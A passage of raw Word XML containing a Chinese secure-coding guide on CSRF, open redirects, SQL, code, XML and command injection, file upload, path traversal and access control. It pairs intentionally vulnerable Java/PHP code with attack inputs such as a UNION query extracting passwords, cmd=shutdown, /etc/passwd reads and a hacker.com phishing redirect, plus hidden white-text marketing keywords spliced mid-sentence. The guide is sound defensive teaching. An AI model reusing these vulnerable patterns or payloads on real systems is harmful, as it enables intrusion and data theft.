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07CD" w:rsidRPr="001807CD" w:rsidRDefault="001807CD" w:rsidP="001807CD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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目录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二零一零年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 xml:space="preserve"> 1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阿里巴巴（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Alibaba.com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）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 xml:space="preserve"> 1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目的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 xml:space="preserve"> 2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使用范围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 xml:space="preserve"> 2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适合读者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 xml:space="preserve"> 2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版本控制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 xml:space="preserve"> 2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分发控制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 xml:space="preserve"> 2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第一章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页面展示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 xml:space="preserve"> 5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Cross Site Script 5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安全威胁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 xml:space="preserve"> 6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代码示例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 xml:space="preserve"> 6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攻击实例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 xml:space="preserve"> 7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解决方案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 xml:space="preserve"> 8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FLASH 10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安全威胁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 xml:space="preserve"> 11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代码示例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 xml:space="preserve"> 11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攻击实例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 xml:space="preserve"> 11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解决方案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 xml:space="preserve"> 12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Third-party script references 15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安全威胁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 xml:space="preserve"> 15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代码示例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 xml:space="preserve"> 15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攻击方法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 xml:space="preserve"> 16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解决方案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 xml:space="preserve"> 16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第二章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伪装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 xml:space="preserve"> 16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Cross-Site Request Forgery 16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安全威胁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 xml:space="preserve"> 16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代码示例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 xml:space="preserve"> 16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攻击实例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 xml:space="preserve"> 17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解决方案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 xml:space="preserve"> 18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常见问题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 xml:space="preserve"> 19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URL redirect 19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安全威胁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 xml:space="preserve"> 19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代码示例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 xml:space="preserve"> 19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攻击方法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 xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统集成</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>企业运维</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统部署</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>智能家居</w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信息安全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 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解决方案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 xml:space="preserve"> 21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第三章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注入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 xml:space="preserve"> 21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SQL injection 21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lastRenderedPageBreak/>
        <w:t>安全威胁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 xml:space="preserve"> 22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代码示例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 xml:space="preserve"> 22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攻击实例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 xml:space="preserve"> 23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解决方案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 xml:space="preserve"> 23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Code injection 24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安全威胁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 xml:space="preserve"> 24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代码示例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 xml:space="preserve"> 24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攻击实例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 xml:space="preserve"> 25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解决方案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 xml:space="preserve"> 26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XML injection 26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安全威胁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 xml:space="preserve"> 26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代码示例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 xml:space="preserve"> 26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攻击实例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 xml:space="preserve"> 27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解决方案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 xml:space="preserve"> 27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System command injection 28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安全威胁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 xml:space="preserve"> 28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代码示例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 xml:space="preserve"> 28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攻击实例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 xml:space="preserve"> 28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解决方案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 xml:space="preserve"> 28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常见问题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 xml:space="preserve"> 28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第四章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文件操作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 xml:space="preserve"> 28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File upload 28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名称定义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 xml:space="preserve"> 28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代码示例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 xml:space="preserve"> 28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攻击实例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 xml:space="preserve"> 29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解决方案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 xml:space="preserve"> 29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File download and Directory traversal 30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安全威胁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 xml:space="preserve"> 30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代码示例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 xml:space="preserve"> 30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攻击实例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 xml:space="preserve"> 30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解决方案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 xml:space="preserve"> 31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第五章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访问控制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 xml:space="preserve"> 31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Vertical Access Control 31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名称定义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 xml:space="preserve"> 31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代码示例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 xml:space="preserve"> 31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攻击方法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 xml:space="preserve"> 32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解决方案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 xml:space="preserve"> 32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Horizontal Access Control 32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lastRenderedPageBreak/>
        <w:t>安全威胁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 xml:space="preserve"> 32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代码示例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 xml:space="preserve"> 32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攻击实例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 xml:space="preserve"> 33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解决方案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 xml:space="preserve"> 34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常见问题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 xml:space="preserve"> 34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第六章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 xml:space="preserve"> Session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管理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 xml:space="preserve"> 35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Cookie httponly flag 35 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安全威胁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 xml:space="preserve"> 35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代码示例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 xml:space="preserve"> 35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攻击实例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 xml:space="preserve"> 35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解决方案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 xml:space="preserve"> 35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常见问题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 xml:space="preserve"> 35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Cookie Secure flag 35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名称定义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 xml:space="preserve"> 36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代码示例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 xml:space="preserve"> 36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攻击方法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 xml:space="preserve"> 36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解决方案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 xml:space="preserve"> 36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Session Expires 37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安全威胁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 xml:space="preserve"> 37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代码示例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 xml:space="preserve"> 37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攻击实例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 xml:space="preserve"> 37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解决方案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 xml:space="preserve"> 37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第七章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密码算法安全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 xml:space="preserve"> 38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Insecure Pseudo randomness 38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安全威胁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 xml:space="preserve"> 38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代码示例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 xml:space="preserve"> 38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攻击实例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 xml:space="preserve"> 39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解决方案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 xml:space="preserve"> 40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Insufficient Encryption Strength 40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安全威胁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 xml:space="preserve"> 40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代码示例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 xml:space="preserve"> 40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攻击实例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 xml:space="preserve"> 41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解决方案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 xml:space="preserve"> 41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第八章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错误处理与日志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 xml:space="preserve"> 42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Error Handling 42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安全威胁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 xml:space="preserve"> 42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代码示例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 xml:space="preserve"> 42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攻击实例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 xml:space="preserve"> 43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lastRenderedPageBreak/>
        <w:t>解决方案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 xml:space="preserve"> 43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Logging 44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记录日志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 xml:space="preserve"> 44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日志存储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 xml:space="preserve"> 44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日志字段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 xml:space="preserve"> 44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第九章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 xml:space="preserve"> Changelog 45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第十章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相关链接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 xml:space="preserve"> 45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第一章页面展示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Cross Site Script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安全威胁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Cross Site Script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（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XSS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），跨站脚本攻击。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攻击者利用应用程序的动态展示数据功能，在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html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页面里嵌入恶意代码。当用户浏览该页之时，这些嵌入在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html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中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的。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 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跨站脚本攻击有两种攻击形式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1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、反射型跨站脚本攻击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攻击者会通过社会工程学手段，发送一个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URL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连接给用户打开，在用户打开页面的同时，浏览器会执行页面中嵌入的恶意脚本。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2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、存储型跨站脚本攻击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攻击者利用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web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应用程序提供的录入或修改数据功能，将数据存储到服务器或用户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cookie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中，当其他用户浏览展示该数据的页面时，浏览器会执行页面中嵌入的恶意脚本。所有浏览者都会受到攻击。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3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、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DOM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跨站攻击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由于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html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页面中，定义了一段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JS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，根据用户的输入，显示一段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html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代码，攻击者可以在输入时，插入一段恶意脚本，最终展示时，会执行恶意脚本。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DOM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跨站和以上两个跨站攻击的差别是，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DOM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跨站是纯页面脚本的输出，只有规范使用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JAVASCRIPT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，才可以防御。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恶意攻击者可以利用跨站脚本攻击做到：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1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、盗取用户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cookie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，伪造用户身份登录。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2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、控制用户浏览器。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3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、结合浏览器及其插件漏洞，下载病毒木马到浏览者的计算机上执行。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4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、衍生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URL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跳转漏洞。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5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、让官方网站出现钓鱼页面。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6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、蠕虫攻击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代码示例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lastRenderedPageBreak/>
        <w:t>直接在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html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页面展示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“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用户可控数据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”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，将直接导致跨站脚本威胁。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 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Java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示例：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某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JSP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文件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while(rs.next())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  {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   %&gt;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   &lt;tr&gt;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   &lt;td&gt;&lt;%=rs.getInt("id") %&gt;&lt;/td&gt;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   &lt;td&gt;&lt;%=rs.getString("pname")%&gt;&lt;/td&gt;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   &lt;td&gt;&lt;%=rs.getString("pdesc")%&gt;&lt;/td&gt;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   &lt;td&gt;&lt;%=rs.getString("ptype")%&gt;&lt;/td&gt;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   &lt;/tr&gt;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   &lt;%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  }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代码中这几个加粗的变量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“rs.getInt("id")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、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rs.getString("pname")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、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rs.getString("pdesc")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、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rs.getString("ptype")”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，被直接输出到了页面中，没有做任何安全过滤，一旦让用户可以输入数据，都可能导致用户浏览器把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“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用户可控数据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”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当成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JS/VBS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脚本执行，或页面元素被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“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用户可控数据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”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插入的页面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HTML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代码控制，从而造成攻击。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PHP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代码示例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   &lt;tr&gt;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   &lt;td&gt;&lt;?=$row["id"] ?&gt;&lt;/td&gt; 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   &lt;td&gt;&lt;?=$row["pname"]?&gt;&lt;/td&gt;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   &lt;td&gt;&lt;?=$row["pdesc"]?&gt;&lt;/td&gt;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   &lt;td&gt;&lt;?=$row["ptype"]?&gt;&lt;/td&gt;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   &lt;/tr&gt;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攻击实例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如果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“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代码示例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”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中的代码，是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alibaba.com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上的一个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web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应用，恶意用户可以做以下攻击。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攻击流程：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1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、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添加产品时插入恶意脚本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攻击者发布产品后，等待用户来浏览产品列表页面。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2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、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一个用户浏览了页面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页面代码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lastRenderedPageBreak/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页面中直接显示了攻击者当时提交的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“pdesc”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的内容，也就是恶意脚本。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将执行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http://inbreak.net/a.js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这个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JS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脚本。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脚本内容：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a=document.createElement("iframe");function b(){e=escape(document.cookie);c=["http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie=",e,Math.random()];document.body.appendChild(a);a.src=c.join();}setTimeout('b()',5000);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获取当前浏览者的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COOKIE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，并发送到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a.php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，这个文件负责接收到用户发来的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cookie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，并保存为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haha.txt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文件。这时，用户的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cookie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已经发送到了攻击者的服务器上，攻击者可以打开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haha.txt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文件。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 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这就是刚才那个用户的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cookie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，攻击者可以使用浏览器插件，把自己的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cookie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替换成刚刚窃取用户的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cookie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。之后攻击者再次访问服务器时，服务器应用程序，就认为攻击者的身份是刚刚那个用户。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解决方案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HTML/XML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页面输出规范：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1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，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在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HTML/XML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中显示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“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用户可控数据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”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前，应该进行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html escape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转义。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JAVA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示例：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&lt;div&gt;#escapeHTML($user.name) &lt;/div&gt;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&lt;td&gt;#escapeHTML($user.name)&lt;/td&gt;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所有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HTML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和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XML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中输出的数据，都应该做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html escape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转义。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escapeHTML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函数参考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esapi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实现：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http://code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/HTMLEntityCodec.java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PHP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示例：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&lt;div&gt;htmlentities($row["user.name"])&lt;/div&gt;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所有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HTML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和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XML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中输出的数据，都应该做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html escape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转义。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escapeHTML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需要进行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html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转义应该按照以下列表进行转义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&amp; --&gt; &amp;amp;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&lt; --&gt; &amp;lt;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&gt; --&gt; &amp;gt;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" --&gt; &amp;quot;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' --&gt; &amp;#39;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2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，在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javascript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内容中输出的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“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用户可控数据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”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，需要做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javascript escape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转义。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 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html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转义并不能保证在脚本执行区域内数据的安全，也不能保证脚本执行代码的正常运行。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JAVA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示例：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lastRenderedPageBreak/>
        <w:t>&lt;script&gt;alert('#escapeJavaScript($user.name)')&lt;/script&gt;   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&lt;script&gt;x='#escapeJavaScript($user.name)'&lt;/script&gt;    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&lt;div onmouseover="x='#escapeJavaScript($user.name)'"&lt;/div&gt;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需要转义的字符包括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/  --&gt;  \/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'  --&gt;  \'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"  --&gt;  \"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\  --&gt;  \\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escapeJavaScript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函数参考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esapi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实现：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http://code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/JavaScriptCodec.java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3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，对输出到富文本中的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“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用户可控数据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”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，做富文本安全过滤（允许用户输出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HTML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的情况）。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示例（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Fasttext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框架）：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&lt;td&gt;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文章内容：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&lt;/td&gt;&lt;td&gt;#SHTML($article.context)&lt;/td&gt;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安全过滤的代码，请参考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“Fasttext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框架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”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的富文本输出函数。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 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Fasttext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源码：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http://svn.alibaba-inc.com/repos/ali_cn/commons/headquarters/trunk/commons/fasttext/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4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，输出在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url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中的数据，做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url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安全输出。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一些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html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标签的属性，需要，如果接收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“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用户可控数据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”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，需要做安全检查。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以下属性的值，如果是用户可控数据，需要做安全检查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'action', 'background', 'codebase', 'dynsrc', 'href', 'lowsrc', 'src',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这些属性的值，一般都是一个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URL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，如果整串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URL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都是由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“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用户可控数据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”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组成的，则必须满足以下条件：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1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）以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“http”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开头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char[] uc = url.toCharArray();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if(uc[0] != 'h' || uc[1] != 't' || uc[2] != 't' || uc[3] != 'p'){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return "";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}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2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）转义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“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用户可控数据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”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中的以下字符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&lt; --&gt; %3C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&gt; --&gt; %3E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" --&gt; %22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' --&gt; %27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举例使用：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&lt;a href=”#surl($url)”&gt;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链接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&lt;/a&gt;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&lt;img src=”#surl($imgurl)”&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001807CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传世移动互联网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 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lastRenderedPageBreak/>
        <w:t>。。。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Surl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函数参考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fasttext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框架中的实现：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http://svn.alibaba-inc.com/repos/ali_cn/commons/headquarters/trunk/commons/fasttext/src/java/com/alibaba/china/fasttext/codec/URLRebuilder.java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5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，针对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DOM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跨站的解决方案，详见《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javascript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安全编码规范》，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URL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在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http://security.alibaba-inc.com/twiki/bin/view/Security/SecuritySolution/JavaScript%E7%BC%96%E7%A0%81%E5%AE%89%E5%85%A8%E8%A7%84%E8%8C%83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6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，在给用户设置认证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COOKIE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时，加入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HTTPONLY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，详见《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Cookie httponly flag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》章节。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7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，在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style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内容中输出的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“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用户可控数据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”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，需要做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CSS escape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转义。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举例使用：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String safe = ESAPI.encoder().encodeForCSS( request.getParameter("input") );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encodeForCSS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实现代码参考：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http://code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/codecs/CSSCodec.java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AJAX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输出规范：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1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、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XML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输出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“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用户可控数据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”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时，对数据部分做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HTML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转义。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 xml:space="preserve">  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示例：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&lt;?xml version="1.0" encoding="UTF-8" ?&gt; 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  &lt;man&gt;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   &lt;name&gt;#xmlEscape($name)&lt;/name&gt;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  &lt;man&gt;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2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、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json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输出要先对变量内容中的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“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用户可控数据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”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单独作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htmlEscape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，再对变量内容做一次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javascriptEscape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。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String cityname=”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浙江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&lt;B&gt;”+StringUtil.htmlEscape(city.name)+”&lt;/B&gt;”;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String json =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"citys:{city:['"+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StringUtil.javascript(cityname) +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"']}";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3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、非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xml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输出（包括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json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、其他自定义数据格式），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response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包中的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http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头的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contentType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，必须为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json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，并且用户可控数据做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htmlEscape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后才能输出。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response.setContentType("application/json");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PrintWriter out = response.getWriter();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out.println(StringUtil.htmlEscape(ajaxReturn));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FLASH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安全威胁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lastRenderedPageBreak/>
        <w:t xml:space="preserve">FLASH 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安全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利用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flash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服务端和客户端在安全配置和文件编码上的问题，导致攻击者可以利用客户端的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flash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文件发起各种请求或者攻击客户端的页面。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FLASH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的安全问题主要有服务端的安全设计问题和客户端的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flash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安全两块：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 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1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、服务端的安全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由于没有正确的配置域策略文件，导致客户端的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flash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文件能够绕过同源策略的限制跨域获取数据。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2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、客户端安全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客户端在嵌入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flash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文件的时候没有指定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flash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文件的客户端限制策略，导致嵌入在客户端的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flash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文件可以访问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HTML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页面的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DOM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数或者发起跨域请求。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恶意攻击者利用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FLASH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的安全问题可以：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1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、绕过浏览器同源策略的限制发起跨域请求，比如发起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CSRF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攻击等。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2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、直接更改页面的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dom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树，发起钓鱼或者跨站攻击。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代码示例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服务器端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crossdomain.xml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的错误配置：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&lt;?xml version="1.0"?&gt;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&lt;cross-domain-policy&gt;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&lt;allow-access-from domain="*" /&gt;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&lt;/cross-domain-policy&gt;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这样的配置可以导致允许任何来自网络上的请求、不论该请求是来自本域内还是其它域发起的。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客户端嵌入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flash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的错误配置：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&lt;object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase=http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0`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name="Main" width="1000" height="600" align="middle" id="Main"&gt; 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&lt;embed flashvars="site=&amp;sitename=" src=”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用户自定仪的一个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flash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文件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” name="Main" allowscriptaccess="always" type="application/x-shockwave-flash"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pluginspage="http://www.macromedia.com/go/getflashplayer" /&gt;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&lt;/object&gt;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例子中的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allowscriptaccess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选项为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always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，这样的配置会使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flash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对于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html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的通讯也就是执行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javascript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不做任何限制，默认情况下值为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“SameDomain”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，既只允许来自于本域的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flash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与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html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通讯，建议设置为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never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；例子中没有设置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allowNetworking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选项，需要把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allowNetworking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设置为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none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，因为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allowNetworking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在设置为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all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（默认是）或者是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internal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的情况下会存在发生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csrfCSRF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的风险，因为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flash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发起网络请求继承的是浏览器的会话，而且会带上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session cookie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和本地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cookie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。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lastRenderedPageBreak/>
        <w:t>攻击实例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1.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引发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XSS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攻击：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在一个页面中嵌入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flash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的代码如下：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&lt;body&gt;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&lt;hi&gt;My Flash Movie&lt;/h1&gt;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&lt;object type=”application/x-shockwave-flash” width=”550” heigt=”400”&gt;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&lt;param name=”allovwScriptAccess” value=”sameDomain”&gt; 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&lt;param name=”movie” value=”myMovie.swf”&gt;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&lt;param name=”quality” value=”high”&gt;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&lt;param name=”bgcolor” value=”#ffffff”&gt;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&lt;embed src=”myMove.swf” width=”550” height=”400”&gt;&lt;/embed&gt;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&lt;/object&gt;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&lt;/body&gt;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用户可以在同域下的某个地方上传一个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flash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文件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如果用户制作一个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flash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代码如下：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Var secretUsername = “cnben”;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Var secretPassword = “hello1234”;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outputBox.htmlText = “please enter a password”;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function checkpassword(){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outputBox.htmlText = “You must be a valid user.”;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}else{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outputBox.htmlText = usernameBox.text +”error”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}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}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Function serPassword(newPassword:String){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secretPassword = newPassword;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}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下面的请求将包含并执行一个存放在远程主机是哪个的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javascript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文件：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 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http://test.com/movie.swf?userParam=&lt;script src=”http://evil.com/script/js”&gt;&lt;/script&gt;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2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．发起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CSRF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攻击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如果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allowNetworking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选项没有做配置，默认为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all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，这种情况下，上传一个如下代码的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swf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文件，用户访问包含这个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swf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文件的额网页将发起一次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CSRF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攻击：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import flash.net.URLRequest;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import flash.system.Security;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var url = new URLRequest("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提交的目标地址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");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var Param = new URLVariables();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lastRenderedPageBreak/>
        <w:t>Param = "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参数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";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url.method = "POST";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url.data = Param;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sendToURL(url);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stop();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解决方案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Flash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配置规范：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1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、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Crossdomain.xml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的安全配置：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如果没有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flash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应用，去掉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crossdomian.xml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文件，对有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flash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应用域的根目录下需要配置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crossdomain.xml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策略文件，设置为只允许来自特定域的请求，比如淘宝的配置文件如下：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&lt;cross-domain-policy&gt;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&lt;allow-access-from domain="*.taobao.com"/&gt;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&lt;allow-access-from domain="*.taobao.net"/&gt;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&lt;allow-access-from domain="*.taobaocdn.com"/&gt; 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&lt;allow-access-from domain="*.allyes.com"/&gt;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&lt;allow-access-from domain="taobao.123show.com"/&gt;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&lt;allow-access-from domain="taobaoa.123show.com"/&gt;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&lt;allow-access-from domain="*.alimama.com"/&gt;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&lt;allow-access-from domain="*.alimama.cn"/&gt;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&lt;allow-access-from domain="*.alimama.net"/&gt;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&lt;allow-access-from domain="*.hippb.com.cn"/&gt;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&lt;allow-access-from domain="*.lianpi.com"/&gt;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&lt;allow-access-from domain="*.tbcdn.cn"/&gt;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&lt;allow-access-from domain="*.kbcdn.com"/&gt;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&lt;allow-access-from domain="*.koubei.com"/&gt;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&lt;/cross-domain-policy&gt;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不允许添加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&lt;site-control permitted-cross-domain-policies="by-content-type"/&gt;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，这样会导致客户端可能自己加载自定义策略文件。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2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、客户端嵌入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flash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文件的安全配置：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1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）禁止设置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flash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的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allowscriptaccess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为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always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，必须设置为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never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，如果设置为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SameDomain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，需要客户可以上传的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flash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文件要在单独的一个域下。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 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2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）设置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allowNetworking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选项为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none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。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3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）设置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allowfullscreen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选项为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false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。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如下配置：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&lt;embed allowscriptaccess="never" allowNetworking=”none” allowfullscreen=”false” height=384 width=454 src=”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用户自定义的一个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flash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文件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 xml:space="preserve">” wmode="transparent" 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lastRenderedPageBreak/>
        <w:t>loop="false" autostart="false"&gt;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flash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开发规范：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1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、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移除敏感信息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确认没有包含像用户名、密码、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SQL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查询或者其他认证信息在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swf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文件里面，因为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swf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文件能够被简单的反编译而使信息泄露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2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、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客户端的验证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客户端的验证能够通过反编译软件轻易的去除后重新编译，必须在客户端和服务端都做一次验证，但是服务端的验证不能少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3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、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去除调试信息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去除类似于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“trace”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和其他一些调试语句，因为他们能够暴露代码或数据的功能，如下代码片段暴露了该段代码的验证功能：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4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、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参数传入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如果有加载外部数据的需求，尽量不要在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html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中用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“params”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标签或者是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querystring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这种形式来注入数据到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swf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文件中。可以的办法是通过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sever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端的一个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http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请求来得到参数。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 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5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、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 xml:space="preserve"> allowDomain()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flash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文件如果有和其他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swf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文件通信的需求，需要在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swf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中配置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allowDomain()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为制定的来源，禁止用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*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符号来允许任意来源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如下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AS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代码被严格禁止：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6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、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 xml:space="preserve"> ActionScript2.0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未初始化全局变量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AS2.0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中接受用户通过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FlashVars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和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Querystring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中传入的数据并放到全局变量空间中，如果利用不当会引发变量未初始化漏洞从而绕过部分认证，如下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AS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代码片段所示：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如果用户在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GET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请求或者在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HTML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中作为一个对象参数将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userLoggedIn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设为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true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，如下所示：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 xml:space="preserve">         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解决方案：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AS2.0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使用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_resolve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属性捕获未定义的变量或函数，如下所示：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                            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7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、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加载调用外部文件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当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FLASH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加载调用外部文件的时候需要过滤掉里面的恶意内容，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主要有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metadata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里面的数据和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flash mp3 player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里的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Mp3 ID3 Data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，可以引发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XSS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漏洞（使攻击者可以执行任意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javascript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），如下代码片段所示：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如果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test.flv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中包含了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js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代码将被执行；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 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lastRenderedPageBreak/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8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、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禁止直接调用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ExternalInterface.call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来接受外部参数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ExternalInterface.call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可以直接调用客户端的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js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脚本，如下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as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代码片段所示：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如果用户提交变量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eval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，提交参数为任意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js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语句，那么用户提交的代码就会被执行。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Third-party script references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安全威胁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Third-party script references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，引用第三方网站脚本或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iframe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指向第三方网站。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第三方网站，是指任何一个非阿里巴巴集团的网站。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当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html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页面引用了第三方网站的脚本，或者有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iframe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指向第三方网站时，一旦这个第三方网站出现安全问题，被黑客控制写入恶意脚本，那么该页面或脚本也会展示在阿里巴巴网站上，会导致阿里巴巴网站的访问者间接受到影响。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代码示例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下面是一段引用第三方网站脚本的代码：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&lt;script src=”http://www.hacker.com/trojan.js”&gt;&lt;/script&gt;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这段代码会执行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www.hacker.com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网站下的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trojan.js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脚本。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下面是一段引用第三方网站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iframe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的代码：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&lt;iframe src=”http://www.hacker.com/trojan.htm”&gt;&lt;/iframe&gt;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这段代码会同时打开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http://www.hacker.com/trojan.htm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这个页面。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 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攻击方法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如果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“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代码示例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”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中的代码，是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alibaba.com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上的一个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web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页面，恶意用户可以做以下攻击。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恶意用户会先入侵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www.hacker.com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这个网站，之后将恶意代码加入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http://www.hacker.com/trojan.js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当这个文件有恶意代码时，也会被展示在阿里巴巴的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web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页面上。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解决方案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禁止引用第三方脚本，禁止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iframe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引用第三方页面。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第二章伪装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Cross-Site Request Forgery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安全威胁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Cross-Site Request Forgery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（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CSRF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），跨站请求伪造攻击。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攻击者在用户浏览网页时，利用页面元素（例如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img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的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src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），强迫受害者的浏览器向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Web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应用程序发送一个改变用户信息的请求。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由于发生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CSRF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攻击后，攻击者是强迫用户向服务器发送请求，所以会造成用户信息被迫修改，更严重者引发蠕虫攻击。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CSRF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攻击可以从站外和站内发起。从站内发起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CSRF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攻击，需要利用网站本身的业务，比如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“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自定义头像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”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功能，恶意用户指定自己的头像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URL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是一个修改用户信息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lastRenderedPageBreak/>
        <w:t>的链接，当其他已登录用户浏览恶意用户头像时，会自动向这个链接发送修改信息请求。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从站外发送请求，则需要恶意用户在自己的服务器上，放一个自动提交修改个人信息的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htm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页面，并把页面地址发给受害者用户，受害者用户打开时，会发起一个请求。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 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如果恶意用户能够知道网站管理后台某项功能的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URL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，就可以直接攻击管理员，强迫管理员执行恶意用户定义的操作。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代码示例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一个没有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CSRF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安全防御的代码如下：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HttpServletRequest request, HttpServletResponse response) {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int userid=Integer.valueOf( request.getSession().getAttribute("userid").toString());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String email=request.getParameter("email");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String tel=request.getParameter("tel");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String realname=request.getParameter("realname");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Object[] params = new Object[4];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params[0] = email;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params[1] = tel;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params[2] = realname;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params[3] = userid;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final String sql = "update user set email=?,tel=?,realname=? where userid=?";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conn.execUpdate(sql,params);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PHP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示例代码：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$userid=$_SESSION["userid"];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$email=$_REQUEST["email"];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$tel=$_REQUEST["tel"];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$realname=$_REQUEST["realname"];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$params = array(); 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$params[0] =$email;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$params[1] = $tel;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$params[2] = $realname;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$params[3] =$userid;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$sql = "update user set email=?,tel=?,realname=? where userid=?";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execUpdate($sql,$params);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代码中接收用户提交的参数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“email,tel,realname”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，之后修改了该用户的数据，一旦接收到一个用户发来的请求，就执行修改操作。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lastRenderedPageBreak/>
        <w:t>提交表单代码：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&lt;form action="http://localhost/servlet/modify" method="POST"&gt;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&lt;input name="email"&gt;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&lt;input name="tel"&gt;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&lt;input name="realname"&gt;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&lt;input name="userid"&gt;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&lt;input type="submit"&gt;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&lt;/form&gt;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当用户点提交时，就会触发修改操作。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攻击实例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本例子是一个站外发起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CSRF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攻击例子。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如果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“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代码示例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”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中的代码，是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alibaba.com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上的一个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web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应用，那么恶意用户为了攻击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alibaba.com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的登录用户，可以构造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2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个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HTML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页面。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1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）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页面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a.htm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中，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iframe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一下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b.htm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，把宽和高都设为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0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。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 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&lt;iframe src="b.htm" width="0" height="0"&gt;&lt;/frame&gt;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这是为了当攻击发生时，受害用户看不到提交成功结果页面。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2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）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页面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b.htm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中，有一个表单，和一段脚本，脚本的作用是，当页面加载时，自动提交这个表单。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&lt;form id="modify" action="http://alibaba.com/servlet/modify" method="POST"&gt;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&lt;input name="email"&gt;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&lt;input name="tel"&gt;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&lt;input name="realname"&gt;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&lt;input name="userid"&gt;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&lt;input type="submit"&gt;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&lt;/form&gt;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&lt;script&gt;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  document.getElementById("modify").submit();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&lt;/script&gt;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3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）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攻击者只要把页面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a.htm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放在自己的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web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服务器上，并发送给登录用户即可。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4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）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用户打开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a.htm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后，会自动提交表单，发送给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alibaba.com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下的那个存在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CSRF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漏洞的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web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应用，所以用户的信息，就被迫修改了。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在整个攻击过程中，受害者用户仅仅看到了一个空白页面（可以伪造成其他无关页面），并且一直不知道自己的信息已经被修改了。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 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解决方案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要防御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CSRF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攻击，必须遵循一下三步：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1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、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在用户登陆时，设置一个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CSRF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的随机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TOKEN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，同时种植在用户的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cookie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中，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lastRenderedPageBreak/>
